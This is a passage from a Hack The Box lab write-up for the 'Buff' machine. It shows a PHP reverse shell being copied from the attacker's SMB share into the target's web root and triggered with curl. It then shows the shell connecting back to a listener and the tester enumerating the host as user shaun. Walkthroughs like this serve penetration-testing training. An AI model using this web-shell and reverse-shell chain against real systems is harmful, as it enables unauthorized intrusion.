Buff_Backdoor

Shell Upgrade

---

c:\xampp\htdocs\gym\upload> copy \\10.10.14.11\smb\shell.php ..\shell.php
�PNG
�
        1 file(s) copied.

Placing a PHP reverse shell at the web root over SMB

Delivery complete

┌──(kali㉿kali)-[~/archive/htb/labs/buff]
└─$ curl http://10.10.10.198:8080/shell.php

Triggering the backdoor

┌──(kali㉿kali)-[~/archive/htb/labs/buff]
└─$ nnc 9999              
listening on [any] 9999 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.198] 49775
socket: Shell has connected! PID: 9028
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.
 
c:\xampp\htdocs\gym> whoami
buff\shaun
 
c:\xampp\htdocs\gym> hostname
BUFF
 
c:\xampp\htdocs\gym> ipconfig
 
Windows IP Configuration
 
 
ethernet adapter ethernet0:
 
   connection-specific dns suffix  . : htb
   ipv6 address. . . . . . . . . . . : dead:beef::23b
   ipv6 address. . . . . . . . . . . : dead:beef::e98a:2472:1538:99c6
   temporary ipv6 address. . . . . . : dead:beef::e531:24da:e024:53e7
   link-local ipv6 address . . . . . : fe80::e98a:2472:1538:99c6%10
   ipv4 address. . . . . . . . . . . : 10.10.10.198
   subnet mask . . . . . . . . . . . : 255.255.255.0
   default gateway . . . . . . . . . : fe80::250:56ff:feb9:6c92%10
                                       10.10.10.2

Initial Foothold established to the target system as the shaun user